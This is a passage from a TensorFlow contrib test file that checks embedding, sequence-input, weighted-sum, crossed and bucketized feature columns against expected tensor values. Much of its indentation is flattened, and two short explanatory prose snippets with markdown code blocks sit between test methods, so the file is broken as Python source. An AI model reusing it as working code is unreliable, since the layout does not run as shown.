with self.test_session():
tf.global_variables_initializer().run()
      # With a ones initializer and a "sum" combiner, each score is the
      # number of values in the row.
self.assertAllEqual(output.eval(), [[1.], [2.], [0.]])
def testEmbeddingColumnWithMaxNormForDNN(self):
hashed_sparse = tf.contrib.layers.sparse_column_with_hash_bucket("wire", 10)
wire_tensor = tf.SparseTensor(values=["omar", "stringer", "marlo"],
indices=[[0, 0], [1, 0], [1, 1]],
shape=[3, 2])
features = {"wire": wire_tensor}
embedded_sparse = tf.contrib.layers.embedding_column(
hashed_sparse,
1,
combiner="sum",
initializer=init_ops.ones_initializer(),
max_norm=0.5)
output = tf.contrib.layers.input_from_feature_columns(features,
[embedded_sparse])
with self.test_session():
tf.global_variables_initializer().run()
      # max_norm clips each embedding vector to norm 0.5, so each score is
      # 0.5 * (number of values in the row).
self.assertAllClose(output.eval(), [[0.5], [1.], [0.]])
def testEmbeddingColumnWithWeightedSparseColumnForDNN(self):
ids = tf.contrib.layers.sparse_column_with_keys(
"ids", ["marlo", "omar", "stringer"])
ids_tensor = tf.SparseTensor(values=["stringer", "stringer", "marlo"],
indices=[[0, 0], [1, 0], [1, 1]],
shape=[3, 2])
weighted_ids = tf.contrib.layers.weighted_sparse_column(ids, "weights")
weights_tensor = tf.SparseTensor(values=[10.0, 20.0, 30.0],
indices=[[0, 0], [1, 0], [1, 1]],
shape=[3, 2])
features = {"ids": ids_tensor,
"weights": weights_tensor}
    embedded_sparse = tf.contrib.layers.embedding_column(
        weighted_ids,
        1,
        combiner="sum",
        initializer=init_ops.ones_initializer())
    output = tf.contrib.layers.input_from_feature_columns(
        features, [embedded_sparse])
with self.test_session():
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
      # With a ones initializer, each score is the sum of the row's weights.
self.assertAllEqual(output.eval(), [[10.], [50.], [0.]])
def testInputLayerWithCollectionsForDNN(self):
real_valued = tf.contrib.layers.real_valued_column("price")
bucket = tf.contrib.layers.bucketized_column(real_valued,
boundaries=[0., 10., 100.])
hashed_sparse = tf.contrib.layers.sparse_column_with_hash_bucket("wire", 10)
features = {
"price": tf.constant([[20.], [110], [-3]]),
"wire": tf.SparseTensor(values=["omar", "stringer", "marlo"],
indices=[[0, 0], [1, 0], [2, 0]],
shape=[3, 1])
}
    embedded_sparse = tf.contrib.layers.embedding_column(hashed_sparse, 10)
    tf.contrib.layers.input_from_feature_columns(
        features, [real_valued, bucket, embedded_sparse],
        weight_collections=["my_collection"])
    weights = tf.get_collection("my_collection")
    # Only the embedded sparse column creates a variable.
    self.assertEqual(1, len(weights))
def testInputLayerWithTrainableArgForDNN(self):
real_valued = tf.contrib.layers.real_valued_column("price")
bucket = tf.contrib.layers.bucketized_column(real_valued,
boundaries=[0., 10., 100.])
hashed_sparse = tf.contrib.layers.sparse_column_with_hash_bucket("wire", 10)
features = {
"price": tf.constant([[20.], [110], [-3]]),
"wire": tf.SparseTensor(values=["omar", "stringer", "marlo"],
indices=[[0, 0], [1, 0], [2, 0]],
shape=[3, 1])
}
    embedded_sparse = tf.contrib.layers.embedding_column(hashed_sparse, 10)
    tf.contrib.layers.input_from_feature_columns(
        features, [real_valued, bucket, embedded_sparse],
        weight_collections=["my_collection"],
        trainable=False)
    # There should not be any trainable variables.
    self.assertEqual(0, len(tf.trainable_variables()))
    tf.contrib.layers.input_from_feature_columns(
        features, [real_valued, bucket, embedded_sparse],
        weight_collections=["my_collection"],
        trainable=True)
    # There should be one trainable variable for the embedded sparse column.
    self.assertEqual(1, len(tf.trainable_variables()))
class SequenceInputFromFeatureColumnTest(tf.test.TestCase):
def testSupportedColumns(self):
measurement = tf.contrib.layers.real_valued_column("measurements")
country = tf.contrib.layers.sparse_column_with_hash_bucket(
"country", 100)
pets = tf.contrib.layers.sparse_column_with_hash_bucket(
"pets", 100)
ids = tf.contrib.layers.sparse_column_with_integerized_feature(
"id", 100)
country_x_pets = tf.contrib.layers.crossed_column(
[country, pets], 100)
country_x_pets_onehot = tf.contrib.layers.one_hot_column(
country_x_pets)
bucketized_measurement = tf.contrib.layers.bucketized_column(
measurement, [.25, .5, .75])
embedded_id = tf.contrib.layers.embedding_column(
ids, 100)
# `_BucketizedColumn` is not supported.
self.assertRaisesRegexp(
ValueError,
"FeatureColumn type _BucketizedColumn is not currently supported",
tf.contrib.layers.sequence_input_from_feature_columns,
{}, [measurement, bucketized_measurement])
# `_CrossedColumn` is not supported.
self.assertRaisesRegexp(
ValueError,
"FeatureColumn type _CrossedColumn is not currently supported",
tf.contrib.layers.sequence_input_from_feature_columns,
{}, [embedded_id, country_x_pets])
# `country_x_pets_onehot` depends on a `_CrossedColumn` which is forbidden.
self.assertRaisesRegexp(
ValueError,
"Column country_X_pets .* _CrossedColumn",
tf.contrib.layers.sequence_input_from_feature_columns,
{}, [embedded_id, country_x_pets_onehot])
def testRealValuedColumn(self):
batch_size = 4
sequence_length = 8
dimension = 3
np.random.seed(1111)
measurement_input = np.random.rand(batch_size, sequence_length, dimension)
measurement_column = tf.contrib.layers.real_valued_column("measurements")
columns_to_tensors = {"measurements": tf.constant(measurement_input)}
model_input_tensor = tf.contrib.layers.sequence_input_from_feature_columns(
columns_to_tensors, [measurement_column])
with self.test_session() as sess:
model_inputs = sess.run(model_input_tensor)
self.assertAllClose(measurement_input, model_inputs)
def testRealValuedColumnWithExtraDimensions(self):
batch_size = 4
sequence_length = 8
dimensions = [3, 4, 5]
np.random.seed(2222)
measurement_input = np.random.rand(batch_size, sequence_length, *dimensions)
measurement_column = tf.contrib.layers.real_valued_column("measurements")
columns_to_tensors = {"measurements": tf.constant(measurement_input)}
model_input_tensor = tf.contrib.layers.sequence_input_from_feature_columns(
columns_to_tensors, [measurement_column])
expected_shape = [batch_size, sequence_length, np.prod(dimensions)]
reshaped_measurements = np.reshape(measurement_input, expected_shape)
with self.test_session() as sess:
model_inputs = sess.run(model_input_tensor)
self.assertAllClose(reshaped_measurements, model_inputs)
def testRealValuedColumnWithNormalizer(self):
batch_size = 4
sequence_length = 8
dimension = 3
normalizer = lambda x: x - 2
np.random.seed(3333)
measurement_input = np.random.rand(batch_size, sequence_length, dimension)
measurement_column = tf.contrib.layers.real_valued_column(
"measurements", normalizer=normalizer)
columns_to_tensors = {"measurements": tf.constant(measurement_input)}
model_input_tensor = tf.contrib.layers.sequence_input_from_feature_columns(
columns_to_tensors, [measurement_column])
with self.test_session() as sess:
model_inputs = sess.run(model_input_tensor)
self.assertAllClose(normalizer(measurement_input), model_inputs)
def testRealValuedColumnWithMultiDimensionsAndNormalizer(self):
batch_size = 4
sequence_length = 8
dimensions = [3, 4, 5]
normalizer = lambda x: x / 2.0
np.random.seed(1234)
measurement_input = np.random.rand(batch_size, sequence_length, *dimensions)
measurement_column = tf.contrib.layers.real_valued_column(
"measurements", normalizer=normalizer)
columns_to_tensors = {"measurements": tf.constant(measurement_input)}
model_input_tensor = tf.contrib.layers.sequence_input_from_feature_columns(
columns_to_tensors, [measurement_column])
expected_shape = [batch_size, sequence_length, np.prod(dimensions)]
reshaped_measurements = np.reshape(measurement_input, expected_shape)
with self.test_session() as sess:
model_inputs = sess.run(model_input_tensor)
self.assertAllClose(normalizer(reshaped_measurements), model_inputs)
def testOneHotColumnFromSparseColumnWithKeys(self):
ids_tensor = tf.SparseTensor(
values=["c", "b",
"a", "c", "b",
"b"],
indices=[[0, 0, 0], [0, 1, 0],
[1, 0, 0], [1, 0, 1], [1, 1, 0],
[3, 2, 0]],
shape=[4, 3, 2])
ids_column = tf.contrib.layers.sparse_column_with_keys(
"ids", ["a", "b", "c", "unseen"])
one_hot_column = tf.contrib.layers.one_hot_column(ids_column)
columns_to_tensors = {"ids": ids_tensor}
model_input_tensor = tf.contrib.layers.sequence_input_from_feature_columns(
columns_to_tensors, [one_hot_column])
with self.test_session() as sess:
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
model_input = sess.run(model_input_tensor)
expected_input_shape = np.array([4, 3, 4])
expected_model_input = np.array(
[[[0, 0, 1, 0], [0, 1, 0, 0], [0, 0, 0, 0]],
[[1, 0, 1, 0], [0, 1, 0, 0], [0, 0, 0, 0]],
[[0, 0, 0, 0], [0, 0, 0, 0], [0, 0, 0, 0]],
[[0, 0, 0, 0], [0, 0, 0, 0], [0, 1, 0, 0]]], dtype=np.float32)
self.assertAllEqual(expected_input_shape, model_input.shape)
self.assertAllClose(expected_model_input, model_input)
def testOneHotColumnFromSparseColumnWithHashBucket(self):
hash_buckets = 10
ids_tensor = tf.SparseTensor(
values=["c", "b",
"a", "c", "b",
"b"],
indices=[[0, 0, 0], [0, 1, 0],
[1, 0, 0], [1, 0, 1], [1, 1, 0],
[3, 2, 0]],
shape=[4, 3, 2])
hashed_ids_column = tf.contrib.layers.sparse_column_with_hash_bucket(
"ids", hash_buckets)
one_hot_column = tf.contrib.layers.one_hot_column(hashed_ids_column)
columns_to_tensors = {"ids": ids_tensor}
model_input_tensor = tf.contrib.layers.sequence_input_from_feature_columns(
columns_to_tensors, [one_hot_column])
with self.test_session() as sess:
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
model_input = sess.run(model_input_tensor)
expected_input_shape = np.array([4, 3, hash_buckets])
self.assertAllEqual(expected_input_shape, model_input.shape)
def testEmbeddingColumn(self):
hash_buckets = 10
embedding_dimension = 5
ids_tensor = tf.SparseTensor(
values=["c", "b",
"a", "c", "b",
"b"],
indices=[[0, 0, 0], [0, 1, 0],
[1, 0, 0], [1, 0, 1], [1, 1, 0],
[3, 2, 0]],
shape=[4, 3, 2])
expected_input_shape = np.array([4, 3, embedding_dimension])
hashed_ids_column = tf.contrib.layers.sparse_column_with_hash_bucket(
"ids", hash_buckets)
embedded_column = tf.contrib.layers.embedding_column(
hashed_ids_column, embedding_dimension)
columns_to_tensors = {"ids": ids_tensor}
model_input_tensor = tf.contrib.layers.sequence_input_from_feature_columns(
columns_to_tensors, [embedded_column])
with self.test_session() as sess:
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
model_input = sess.run(model_input_tensor)
self.assertAllEqual(expected_input_shape, model_input.shape)
def testEmbeddingColumnGradient(self):
hash_buckets = 1000
embedding_dimension = 3
ids_tensor = tf.SparseTensor(
values=["c", "b",
"a", "c", "b",
"b"],
indices=[[0, 0, 0], [0, 1, 0],
[1, 0, 0], [1, 0, 1], [1, 1, 0],
[3, 2, 0]],
shape=[4, 3, 2])
hashed_ids_column = tf.contrib.layers.sparse_column_with_hash_bucket(
"ids", hash_buckets)
embedded_column = tf.contrib.layers.embedding_column(
hashed_ids_column, embedding_dimension, combiner="sum")
columns_to_tensors = {"ids": ids_tensor}
model_input_tensor = tf.contrib.layers.sequence_input_from_feature_columns(
columns_to_tensors,
[embedded_column],
weight_collections=["my_collection"])
embedding_weights = tf.get_collection("my_collection")
gradient_tensor = tf.gradients(model_input_tensor, embedding_weights)
with self.test_session() as sess:
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
model_input, gradients = sess.run([model_input_tensor, gradient_tensor])
expected_input_shape = [4, 3, embedding_dimension]
self.assertAllEqual(expected_input_shape, model_input.shape)
# `ids_tensor` consists of 7 instances of <empty>, 3 occurrences of "b",
# 2 occurrences of "c" and 1 occurrence of "a".
expected_gradient_values = sorted([0., 3., 2., 1.] * embedding_dimension)
actual_gradient_values = np.sort(gradients[0].values, axis=None)
self.assertAllClose(expected_gradient_values, actual_gradient_values)
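The expected gradient values above are just id occurrence counts; a minimal stdlib-only sketch of that bookkeeping (illustrative, not part of the original suite):

```python
from collections import Counter

# With combiner="sum", the sequence input is a sum of embedding rows, so the
# gradient w.r.t. each looked-up row equals how often its id occurs.
id_counts = Counter(["c", "b", "a", "c", "b", "b"])
counts = sorted(id_counts.values())  # [1, 2, 3]
```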
def testMultipleColumns(self):
batch_size = 4
sequence_length = 3
measurement_dimension = 5
country_hash_size = 10
max_id = 200
id_embedding_dimension = 11
normalizer = lambda x: x / 10.0
measurement_tensor = tf.random_uniform(
[batch_size, sequence_length, measurement_dimension])
country_tensor = tf.SparseTensor(
values=["us", "ca",
"ru", "fr", "ca",
"mx"],
indices=[[0, 0, 0], [0, 1, 0],
[1, 0, 0], [1, 0, 1], [1, 1, 0],
[3, 2, 0]],
shape=[4, 3, 2])
id_tensor = tf.SparseTensor(
values=[2, 5,
26, 123, 1,
0],
indices=[[0, 0, 0], [0, 0, 1], [0, 1, 1],
[1, 0, 0], [1, 1, 0],
[3, 2, 0]],
shape=[4, 3, 2])
columns_to_tensors = {"measurements": measurement_tensor,
"country": country_tensor,
"id": id_tensor}
measurement_column = tf.contrib.layers.real_valued_column(
"measurements", normalizer=normalizer)
country_column = tf.contrib.layers.sparse_column_with_hash_bucket(
"country", country_hash_size)
id_column = tf.contrib.layers.sparse_column_with_integerized_feature(
"id", max_id)
onehot_country_column = tf.contrib.layers.one_hot_column(country_column)
embedded_id_column = tf.contrib.layers.embedding_column(
id_column, id_embedding_dimension)
model_input_columns = [measurement_column,
onehot_country_column,
embedded_id_column]
model_input_tensor = tf.contrib.layers.sequence_input_from_feature_columns(
columns_to_tensors, model_input_columns)
self.assertEqual(tf.float32, model_input_tensor.dtype)
with self.test_session() as sess:
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
model_input = sess.run(model_input_tensor)
expected_input_shape = [
batch_size,
sequence_length,
measurement_dimension + country_hash_size + id_embedding_dimension]
self.assertAllEqual(expected_input_shape, model_input.shape)
class WeightedSumTest(tf.test.TestCase):
def testSparseColumn(self):
hashed_sparse = tf.contrib.layers.sparse_column_with_hash_bucket("wire", 10)
wire_tensor = tf.SparseTensor(values=["omar", "stringer", "marlo"],
indices=[[0, 0], [1, 0], [1, 1]],
shape=[2, 2])
features = {"wire": wire_tensor}
logits, _, _ = tf.contrib.layers.weighted_sum_from_feature_columns(
features, [hashed_sparse], num_outputs=5)
with self.test_session():
tf.global_variables_initializer().run()
self.assertAllEqual(logits.eval().shape, [2, 5])
def testSparseIntColumn(self):
"""Tests a sparse column with int values."""
hashed_sparse = tf.contrib.layers.sparse_column_with_hash_bucket(
"wire", 10, dtype=tf.int64)
wire_tensor = tf.SparseTensor(values=[101, 201, 301],
indices=[[0, 0], [1, 0], [1, 1]],
shape=[2, 2])
features = {"wire": wire_tensor}
logits, _, _ = tf.contrib.layers.weighted_sum_from_feature_columns(
features, [hashed_sparse], num_outputs=5)
with self.test_session():
tf.global_variables_initializer().run()
self.assertAllEqual(logits.eval().shape, [2, 5])
def testSparseColumnWithDenseInputTensor(self):
hashed_sparse = tf.contrib.layers.sparse_column_with_hash_bucket("wire", 10)
wire_tensor = tf.constant([["omar", "stringer"], ["marlo", "rick"]])
features = {"wire": wire_tensor}
logits, _, _ = tf.contrib.layers.weighted_sum_from_feature_columns(
features, [hashed_sparse], num_outputs=5)
with self.test_session():
tf.global_variables_initializer().run()
self.assertAllEqual(logits.eval().shape, [2, 5])
def testWeightedSparseColumn(self):
ids = tf.contrib.layers.sparse_column_with_keys(
"ids", ["marlo", "omar", "stringer"])
ids_tensor = tf.SparseTensor(values=["stringer", "stringer", "marlo"],
indices=[[0, 0], [1, 0], [1, 1]],
shape=[2, 2])
weighted_ids = tf.contrib.layers.weighted_sparse_column(ids, "weights")
weights_tensor = tf.SparseTensor(values=[10.0, 20.0, 30.0],
indices=[[0, 0], [1, 0], [1, 1]],
shape=[2, 2])
features = {"ids": ids_tensor,
"weights": weights_tensor}
logits, _, _ = tf.contrib.layers.weighted_sum_from_feature_columns(
features, [weighted_ids], num_outputs=5)
with self.test_session():
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
self.assertAllEqual(logits.eval().shape, [2, 5])
def testWeightedSparseColumnWithDenseInputTensor(self):
ids = tf.contrib.layers.sparse_column_with_keys(
"ids", ["marlo", "omar", "stringer", "rick"])
ids_tensor = tf.constant([["omar", "stringer"], ["marlo", "rick"]])
weighted_ids = tf.contrib.layers.weighted_sparse_column(ids, "weights")
weights_tensor = tf.constant([[10.0, 20.0], [30.0, 40.0]])
features = {"ids": ids_tensor,
"weights": weights_tensor}
logits, _, _ = tf.contrib.layers.weighted_sum_from_feature_columns(
features, [weighted_ids], num_outputs=5)
with self.test_session():
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
self.assertAllEqual(logits.eval().shape, [2, 5])
def testCrossedColumn(self):
a = tf.contrib.layers.sparse_column_with_hash_bucket("aaa",
hash_bucket_size=100)
b = tf.contrib.layers.sparse_column_with_hash_bucket("bbb",
hash_bucket_size=100)
crossed = tf.contrib.layers.crossed_column(
set([a, b]), hash_bucket_size=10000)
wire_tensor = tf.SparseTensor(values=["omar", "stringer", "marlo"],
indices=[[0, 0], [1, 0], [1, 1]],
shape=[2, 2])
features = {"aaa": wire_tensor, "bbb": wire_tensor}
logits, _, _ = tf.contrib.layers.weighted_sum_from_feature_columns(
features, [crossed], num_outputs=5)
with self.test_session():
tf.global_variables_initializer().run()
self.assertAllEqual(logits.eval().shape, [2, 5])
def testEmbeddingColumn(self):
hashed_sparse = tf.contrib.layers.sparse_column_with_hash_bucket("wire", 10)
wire_tensor = tf.SparseTensor(values=["omar", "stringer", "marlo"],
indices=[[0, 0], [1, 0], [1, 1]],
shape=[2, 2])
features = {"wire": wire_tensor}
embedded_sparse = tf.contrib.layers.embedding_column(hashed_sparse, 10)
with self.test_session():
with self.assertRaisesRegexp(
ValueError, "Error creating weighted sum for column: wire_embedding"):
tf.global_variables_initializer().run()
tf.contrib.layers.weighted_sum_from_feature_columns(features,
[embedded_sparse],
num_outputs=5)
def testRealValuedColumnWithMultiDimensions(self):
real_valued = tf.contrib.layers.real_valued_column("price", 2)
features = {"price": tf.constant([[20., 10.], [110, 0.], [-3, 30]])}
logits, _, _ = tf.contrib.layers.weighted_sum_from_feature_columns(
features, [real_valued], num_outputs=5)
with self.test_session():
tf.global_variables_initializer().run()
self.assertAllEqual(logits.eval().shape, [3, 5])
def testBucketizedColumnWithMultiDimensions(self):
bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column("price", 2),
boundaries=[0., 10., 100.])
features = {"price": tf.constant([[20., 10.], [110, 0.], [-3, 30]])}
logits, _, _ = tf.contrib.layers.weighted_sum_from_feature_columns(
features, [bucket], num_outputs=5)
with self.test_session():
tf.global_variables_initializer().run()
self.assertAllEqual(logits.eval().shape, [3, 5])
def testAllWideColumns(self):
real_valued = tf.contrib.layers.real_valued_column("income", 2)
bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column("price"),
boundaries=[0., 10., 100.])
hashed_sparse = tf.contrib.layers.sparse_column_with_hash_bucket("wire", 10)
crossed = tf.contrib.layers.crossed_column([bucket, hashed_sparse], 100)
features = {
"income": tf.constant([[20., 10], [110, 0], [-3, 30]]),
"price": tf.constant([[20.], [110], [-3]]),
"wire": tf.SparseTensor(values=["omar", "stringer", "marlo"],
indices=[[0, 0], [1, 0], [2, 0]],
shape=[3, 1])
}
output, _, _ = tf.contrib.layers.weighted_sum_from_feature_columns(
features, [real_valued, bucket, hashed_sparse, crossed],
num_outputs=5)
with self.test_session():
tf.global_variables_initializer().run()
self.assertAllEqual(output.eval().shape, [3, 5])
def testPredictions(self):
language = tf.contrib.layers.sparse_column_with_keys(
column_name="language",
keys=["english", "finnish", "hindi"])
age = tf.contrib.layers.real_valued_column("age")
with tf.Graph().as_default():
features = {
"age": tf.constant([[1], [2]]),
"language": tf.SparseTensor(values=["hindi", "english"],
indices=[[0, 0], [1, 0]],
shape=[2, 1]),
}
output, column_to_variable, bias = (
tf.contrib.layers.weighted_sum_from_feature_columns(features,
[age, language],
num_outputs=1))
with self.test_session() as sess:
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
self.assertAllClose(output.eval(), [[0.], [0.]])
sess.run(bias.assign([0.1]))
self.assertAllClose(output.eval(), [[0.1], [0.1]])
# score: 0.1 + age*0.2
sess.run(column_to_variable[age][0].assign([[0.2]]))
self.assertAllClose(output.eval(), [[0.3], [0.5]])
# score: 0.1 + age*0.2 + language_weight[language_index]
sess.run(column_to_variable[language][0].assign([[0.1], [0.3], [0.2]]))
self.assertAllClose(output.eval(), [[0.5], [0.6]])
def testJointPredictions(self):
country = tf.contrib.layers.sparse_column_with_keys(
column_name="country",
keys=["us", "finland"])
language = tf.contrib.layers.sparse_column_with_keys(
column_name="language",
keys=["english", "finnish", "hindi"])
with tf.Graph().as_default():
features = {
"country": tf.SparseTensor(values=["finland", "us"],
indices=[[0, 0], [1, 0]],
shape=[2, 1]),
"language": tf.SparseTensor(values=["hindi", "english"],
indices=[[0, 0], [1, 0]],
shape=[2, 1]),
}
output, variables, bias = (
tf.contrib.layers.joint_weighted_sum_from_feature_columns(
features, [country, language], num_outputs=1))
# Assert that only a single weight is created.
self.assertEqual(len(variables), 1)
with self.test_session() as sess:
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
self.assertAllClose(output.eval(), [[0.], [0.]])
sess.run(bias.assign([0.1]))
self.assertAllClose(output.eval(), [[0.1], [0.1]])
# Shape is [5, 1] because there are 2 + 3 features and 1 output class.
self.assertEqual(variables[0].get_shape().as_list(), [5, 1])
# score: bias + country_weight + language_weight
sess.run(variables[0].assign([[0.1], [0.2], [0.3], [0.4], [0.5]]))
self.assertAllClose(output.eval(), [[0.8], [0.5]])
def testJointPredictionsWeightedFails(self):
language = tf.contrib.layers.weighted_sparse_column(
tf.contrib.layers.sparse_column_with_keys(
column_name="language",
keys=["english", "finnish", "hindi"]),
"weight")
with tf.Graph().as_default():
features = {
"weight": tf.constant([[1], [2]]),
"language": tf.SparseTensor(values=["hindi", "english"],
indices=[[0, 0], [1, 0]],
shape=[2, 1]),
}
with self.assertRaises(AssertionError):
tf.contrib.layers.joint_weighted_sum_from_feature_columns(
features, [language], num_outputs=1)
def testJointPredictionsRealFails(self):
age = tf.contrib.layers.real_valued_column("age")
with tf.Graph().as_default():
features = {
"age": tf.constant([[1], [2]]),
}
with self.assertRaises(NotImplementedError):
tf.contrib.layers.joint_weighted_sum_from_feature_columns(
features, [age], num_outputs=1)
def testPredictionsWithWeightedSparseColumn(self):
language = tf.contrib.layers.sparse_column_with_keys(
column_name="language",
keys=["english", "finnish", "hindi"])
weighted_language = tf.contrib.layers.weighted_sparse_column(
sparse_id_column=language,
weight_column_name="age")
with tf.Graph().as_default():
features = {
"language": tf.SparseTensor(values=["hindi", "english"],
indices=[[0, 0], [1, 0]],
shape=[2, 1]),
"age": tf.SparseTensor(values=[10.0, 20.0],
indices=[[0, 0], [1, 0]],
shape=[2, 1])
}
output, column_to_variable, bias = (
tf.contrib.layers.weighted_sum_from_feature_columns(
features, [weighted_language], num_outputs=1))
with self.test_session() as sess:
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
self.assertAllClose(output.eval(), [[0.], [0.]])
sess.run(bias.assign([0.1]))
self.assertAllClose(output.eval(), [[0.1], [0.1]])
# score: bias + age*language_weight[index]
sess.run(column_to_variable[weighted_language][0].assign(
[[0.1], [0.2], [0.3]]))
self.assertAllClose(output.eval(), [[3.1], [2.1]])
def testPredictionsWithMultivalentColumnButNoCross(self):
language = tf.contrib.layers.sparse_column_with_keys(
column_name="language",
keys=["english", "turkish", "hindi"])
with tf.Graph().as_default():
features = {
"language": tf.SparseTensor(values=["hindi", "english"],
indices=[[0, 0], [0, 1]],
shape=[1, 2])
}
output, column_to_variable, bias = (
tf.contrib.layers.weighted_sum_from_feature_columns(features,
[language],
num_outputs=1))
with self.test_session() as sess:
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
# score: 0.1 + language_weight['hindi'] + language_weight['english']
sess.run(bias.assign([0.1]))
sess.run(column_to_variable[language][0].assign([[0.1], [0.3], [0.2]]))
self.assertAllClose(output.eval(), [[0.4]])
def testSparseFeatureColumnWithHashedBucketSize(self):
movies = tf.contrib.layers.sparse_column_with_hash_bucket(
column_name="movies", hash_bucket_size=15)
with tf.Graph().as_default():
features = {
"movies": tf.SparseTensor(
values=["matrix", "head-on", "winter sleep"],
indices=[[0, 0], [0, 1], [1, 0]],
shape=[2, 2])
}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(features,
[movies],
num_outputs=1))
with self.test_session() as sess:
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
weights = column_to_variable[movies][0]
self.assertEqual(weights.get_shape(), (15, 1))
sess.run(weights.assign(weights + 0.4))
# score for first example = 0.4 (matrix) + 0.4 (head-on) = 0.8
# score for second example = 0.4 (winter sleep)
self.assertAllClose(output.eval(), [[0.8], [0.4]])
def testCrossUsageInPredictions(self):
language = tf.contrib.layers.sparse_column_with_hash_bucket(
"language", hash_bucket_size=3)
country = tf.contrib.layers.sparse_column_with_hash_bucket(
"country", hash_bucket_size=5)
country_language = tf.contrib.layers.crossed_column(
[language, country], hash_bucket_size=10)
with tf.Graph().as_default():
features = {
"language": tf.SparseTensor(values=["english", "spanish"],
indices=[[0, 0], [1, 0]],
shape=[2, 1]),
"country": tf.SparseTensor(values=["US", "SV"],
indices=[[0, 0], [1, 0]],
shape=[2, 1])
}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(
features, [country_language],
num_outputs=1))
with self.test_session() as sess:
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
weights = column_to_variable[country_language][0]
sess.run(weights.assign(weights + 0.4))
self.assertAllClose(output.eval(), [[0.4], [0.4]])
def testCrossColumnByItself(self):
language = tf.contrib.layers.sparse_column_with_hash_bucket(
"language", hash_bucket_size=3)
language_language = tf.contrib.layers.crossed_column(
[language, language], hash_bucket_size=10)
with tf.Graph().as_default():
features = {
"language": tf.SparseTensor(values=["english", "spanish"],
indices=[[0, 0], [0, 1]],
shape=[1, 2]),
}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(
features, [language_language],
num_outputs=1))
with self.test_session() as sess:
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
weights = column_to_variable[language_language][0]
sess.run(weights.assign(weights + 0.4))
# There are two features inside language. If we cross it by itself we'll
# have four crossed features.
self.assertAllClose(output.eval(), [[1.6]])
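The four-feature count in the comment above can be sketched with a Cartesian product (stdlib only; illustrative, not part of the original test):

```python
import itertools

# Crossing a column with itself pairs every value with every value, so a
# two-valued example produces 2 * 2 = 4 crossed features.
crosses = list(itertools.product(["english", "spanish"], repeat=2))
num_crosses = len(crosses)
```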
def testMultivalentCrossUsageInPredictions(self):
language = tf.contrib.layers.sparse_column_with_hash_bucket(
"language", hash_bucket_size=3)
country = tf.contrib.layers.sparse_column_with_hash_bucket(
"country", hash_bucket_size=5)
country_language = tf.contrib.layers.crossed_column(
[language, country], hash_bucket_size=10)
with tf.Graph().as_default():
features = {
"language": tf.SparseTensor(values=["english", "spanish"],
indices=[[0, 0], [0, 1]],
shape=[1, 2]),
"country": tf.SparseTensor(values=["US", "SV"],
indices=[[0, 0], [0, 1]],
shape=[1, 2])
}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(
features, [country_language],
num_outputs=1))
with self.test_session() as sess:
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
weights = column_to_variable[country_language][0]
sess.run(weights.assign(weights + 0.4))
# There are four crosses each with 0.4 weight.
# score = 0.4 + 0.4 + 0.4 + 0.4
self.assertAllClose(output.eval(), [[1.6]])
def testMultivalentCrossUsageInPredictionsWithPartition(self):
# Bucket sizes have to be big enough to allow sharding.
language = tf.contrib.layers.sparse_column_with_hash_bucket(
"language", hash_bucket_size=64 << 19)
country = tf.contrib.layers.sparse_column_with_hash_bucket(
"country", hash_bucket_size=64 << 18)
country_language = tf.contrib.layers.crossed_column(
[language, country], hash_bucket_size=64 << 18)
with tf.Graph().as_default():
features = {
"language": tf.SparseTensor(values=["english", "spanish"],
indices=[[0, 0], [0, 1]],
shape=[1, 2]),
"country": tf.SparseTensor(values=["US", "SV"],
indices=[[0, 0], [0, 1]],
shape=[1, 2])
}
with tf.variable_scope(
"weighted_sum_from_feature_columns",
features.values(),
partitioner=tf.min_max_variable_partitioner(
max_partitions=10, min_slice_size=((64 << 20) - 1))) as scope:
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(
features, [country, language, country_language],
num_outputs=1,
scope=scope))
with self.test_session() as sess:
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
self.assertEqual(2, len(column_to_variable[country]))
self.assertEqual(3, len(column_to_variable[language]))
self.assertEqual(2, len(column_to_variable[country_language]))
weights = column_to_variable[country_language]
for partition_variable in weights:
sess.run(partition_variable.assign(partition_variable + 0.4))
# There are four crosses each with 0.4 weight.
# score = 0.4 + 0.4 + 0.4 + 0.4
self.assertAllClose(output.eval(), [[1.6]])
def testRealValuedColumnHavingMultiDimensions(self):
country = tf.contrib.layers.sparse_column_with_hash_bucket(
"country", hash_bucket_size=5)
age = tf.contrib.layers.real_valued_column("age")
# The following RealValuedColumn has 3 dimensions.
incomes = tf.contrib.layers.real_valued_column("incomes", 3)
with tf.Graph().as_default():
features = {"age": tf.constant([[1], [1]]),
"incomes": tf.constant([[100., 200., 300.], [10., 20., 30.]]),
"country": tf.SparseTensor(values=["US", "SV"],
indices=[[0, 0], [1, 0]],
shape=[2, 2])}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(
features, [country, age, incomes],
num_outputs=1))
with self.test_session() as sess:
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
incomes_weights = column_to_variable[incomes][0]
sess.run(incomes_weights.assign([[0.1], [0.2], [0.3]]))
self.assertAllClose(output.eval(), [[140.], [14.]])
def testMulticlassWithRealValuedColumnHavingMultiDimensions(self):
country = tf.contrib.layers.sparse_column_with_hash_bucket(
"country", hash_bucket_size=5)
